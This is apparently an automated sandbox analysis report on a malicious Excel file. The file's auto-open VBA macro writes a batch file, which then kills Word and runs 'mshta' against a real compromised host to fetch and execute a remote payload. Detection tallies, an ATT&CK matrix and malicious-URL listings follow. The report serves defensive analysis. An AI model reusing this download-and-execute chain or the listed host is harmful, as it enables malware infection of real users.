Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: C:\Windows\System32\mshta.exeWindows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dllJump to behavior
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary

barindex
Document contains an embedded VBA macro with suspicious strings
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsOLE, VBA macro line: sFile = Environ("Public") & "\Outlook.bat"
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_Open, String environ: sFile = Environ("Public") & "\Outlook.bat"Name: Workbook_Open
Source: C:\Windows\System32\mshta.exeCode function: 8_2_051476208_2_05147620
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146E488_2_05146E48
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsOLE, VBA macro line: Private Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module EstaPastaDeTrabalho, Function Workbook_OpenName: Workbook_Open
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsVirustotal: Detection: 49%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsMetadefender: Detection: 29%
Source: SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsReversingLabs: Detection: 41%
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................zA......................vg.......................A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............8.,.....2..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............c.a.l.l........./.........................,......$.J............/.................,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .g.e.t.C.m.d.P.i.d...b.a.t. ............qg.....c.a.l.l...........A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................i.d...b..................qg.....c.a.l.l...........A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ..!................J....................................@c.J..... ........,.............v..v............ .,.......!.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................zA......................vg.......................A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J............8.,.....2..................J....Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............s.e.t.........../.........................,......$.J............/.................,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .P.I.D.=.1. ............................qg.....s.e.t.............A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X........................................................qg.....s.e.t.............A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X.................................E......................vg.......................A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .w.i.n.d.o.w.M.o.d.e...b.a.t. .-.p.i.d. .1. .-.m.o.d.e. .h.i.d.d.e.n. ...........,.....H.......................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................o.d.e....................qg.....m.o.d.e...........A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ..!................J....................................@c.J..... ........,.............v..v............ .,.......!.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X................................zA......................vg.......................A...............,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............c.d............./.........................,......$.J............/.................,.............................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X............... .C.:.\.U.s.e.r.s.\.P.u.b.l.i.c. ........qg.....c.d...............A...............,.....".......................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ................X...............................s.\.P.u..................qg.....c.d...............A...............,.............................Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................h...............................d1K.....................................d...............e...............X.......B.........+.....Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txt
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WINWORD.EXE&quot;)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\Public\Outlook.batJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6077.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@11/88@5/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Windows\System32\mshta.exeCode function: 8_2_051483D3 push ecx; ret 8_2_05148431
Source: C:\Windows\System32\mshta.exeCode function: 8_2_051482C1 push ecx; ret 8_2_05148310
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146AF2 push ecx; ret 8_2_05146BDE
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146B27 push ecx; ret 8_2_05146BDE
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146802 pushad ; retf 0003h8_2_05146803
Source: C:\Windows\System32\mshta.exeCode function: 8_2_0514B002 pushad ; retf 0003h8_2_0514B003
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146A9F push ecx; ret 8_2_05146AD5
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146A86 push ecx; ret 8_2_05146AD5
Source: C:\Windows\System32\mshta.exeCode function: 8_2_05146ADB push ecx; ret 8_2_05146BDE
Source: C:\Windows\System32\mshta.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1412Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1516Thread sleep time: -360000s >= -30000sJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start /min taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://facextrade.com.br/wp-includes/certificates/4.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im WINWORD.EXE Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		Path Interception11
Process Injection		1
Masquerading		1
Input Capture		1
Virtualization/Sandbox Evasion		Remote Services1
Email Collection		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Command and Scripting Interpreter		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Modify Registry		LSASS Memory11
Remote System Discovery		Remote Desktop Protocol1
Input Capture		Exfiltration Over Bluetooth4
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts121
Scripting		Logon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager1
System Network Configuration Discovery		SMB/Windows Admin Shares1
Archive Collected Data		Automated Exfiltration3
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts23
Exploitation for Client Execution		Logon Script (Mac)Logon Script (Mac)11
Disable or Modify Tools		NTDS1
File and Directory Discovery		Distributed Component Object Model1
Clipboard Data		Scheduled Transfer14
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets14
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common121
Scripting		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls49%VirustotalBrowse
SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls29%MetadefenderBrowse
SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls41%ReversingLabsScript-Macro.Downloader.Amphitryon
SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls100%AviraX97M/Agent.9944011
SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
facextrade.com.br5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60C;100%Avira URL Cloudmalware
https://facextrade.com.br/feed/atom/Y100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextra100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0ET4.0E)re100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)100%Avira URL Cloudmalware
http://adomas.org/javascript-mouse-wheel/0%URL Reputationsafe
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.21.2.1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/main-style.css.css?ver=4.9.204.9.201.2.8.1241100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-201204179100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/favicon.ico100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0100%Avira URL Cloudmalware
http://facextrade.com.br/ae100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0http://facextrade.com100%Avira URL Cloudmalware
http://facextrade.com.br/xmlrpc.phpa100%Avira URL Cloudmalware
https://csp.withgoogle.com/csp/report-to/apps-themes0%URL Reputationsafe
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.019100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1la100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/gtranslate/flags/16/pt-br.png100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6i100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0P100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg.0=1.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/chart.min.js?ver=1.0C:100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6ver=2.3.0100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3-US100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2ii100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.30E)ferr100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-includes/certificates/privacy-policyflateC100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.30E)nsla#100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0ET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/themes/CherryFramework/style.css.9.20ive.css.NET4.0E)100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)&100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3100%Avira URL Cloudmalware
http://kyruus.com0%URL Reputationsafe
http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1100%Avira URL Cloudmalware
http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0.NET4.0E)J100%Avira URL Cloudmalware
